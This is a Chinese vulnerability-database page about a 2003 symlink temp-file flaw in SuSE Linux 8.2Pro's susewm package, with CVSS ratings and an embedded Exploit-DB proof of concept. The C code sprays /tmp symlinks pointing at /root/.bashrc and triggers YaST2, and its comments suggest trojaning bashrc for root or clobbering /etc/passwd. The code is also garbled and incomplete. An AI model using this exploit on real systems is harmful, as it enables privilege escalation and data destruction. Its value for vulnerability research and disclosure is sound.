发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:37:58

[原文]SuSEconfig.susewm in the susewm package on SuSE Linux 8.2Pro allows local users to overwrite arbitrary files via a symlink attack on the susewm.$$ temporary file.

[CNNVD]SuSE Linux 漏洞(CNNVD-200311-031)

        SuSE Linux 8.2Pro版本中susewm包的SuSEconfig.susewm存在漏洞。本地用户可以通过对susewm.$$临时文件的符号链接攻击浏览任意文件。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20031006 Local root exploit in SuSE Linux 8.2Pro
(UNKNOWN)  BUGTRAQ  20031006 Re: Local root exploit in SuSE Linux 8.2Pro

- 漏洞信息

SuSE Linux 漏洞
中危 未知
2003-11-17 00:00:00 2005-10-20 00:00:00
        SuSE Linux 8.2Pro版本中susewm包的SuSEconfig.susewm存在漏洞。本地用户可以通过对susewm.$$临时文件的符号链接攻击浏览任意文件。

- 公告与补丁


- 漏洞信息 (23223)

SuSE Linux Professional 8.2 SuSEWM Configuration File Insecure Temporary File Vulnerability (EDBID:23223)
linux local
2003-10-06 Verified
0 Nash Leon
N/A [点击下载]

A problem exists in the SuSEWM configuration file used by SuSEConfig. Because of this, it may be possible for a local attacker to gain elevated privileges.

 * Proof of Concept for SuSEconfig.vmware Symbolic Link. 
 * Tested on SuSE 8.2.
 * Nash Leon  -
 * Reference: 
 * We Need Yast2 for elevation privilege(or wait root run then).
 * This sample create file /root/.bashrc in Suse 8.2. 
 * If you use this with kdeglobals vulnerability, you can install trojan 
 * horse in bashrc(local root is possible). Denial of Service too,
 * if you define target file /etc/passwd or other.
 * Thanks for Mercenaries's Club

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

#define  ERROR   -1
#define  TARGET  "/root/.bashrc" /* Change this for other attack */

int main(int argc, char *argv[]){
int i, first, last;
char buffer[60];

fprintf(stdout,"Proof of Concept for Symbolic Link in SuSEconfig.vmware - Suse 8.2\n");
fprintf(stdout,"Mercenaries's Club -\n");

/* We don't need to get Current PID. Suse 8.2 is very poor em security
 * against symbolic link attacks.
 * There is not protect for creation of symbolic links in
 * /tmp. We can create 65535 files with symbolic link
 * if We wanted(this is 100% accurate).

//first = getpid();

first = 0;

/* We don't need to get possible PID for Yast2 sw_single run
 * SuSE.vmware because SuSE 8.2 don't limit creation of 
 * symbolic links.

last = 65535;

for(i = first; i < last + 1; i++){
snprintf(buffer,59,"ln -s %s /tmp/susewm.%d",TARGET,i); // Are you hacker?:)

/* Run Yast2, note this need X-Window and permission.
 * This code is not for script kiddies.
 * Other attacks are possible.
 * In Yast2, you will try uninstall some program.
 * When Yast2 run update tool, it will run SuSEconfig.vmware
 * as root and the specified file will be overwrite.

system("/sbin/yast2 'sw_single'");

return 0;


- 漏洞信息

SuSEconfig.susewm Symlink Arbitrary File Overwrite
Local Access Required Race Condition

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete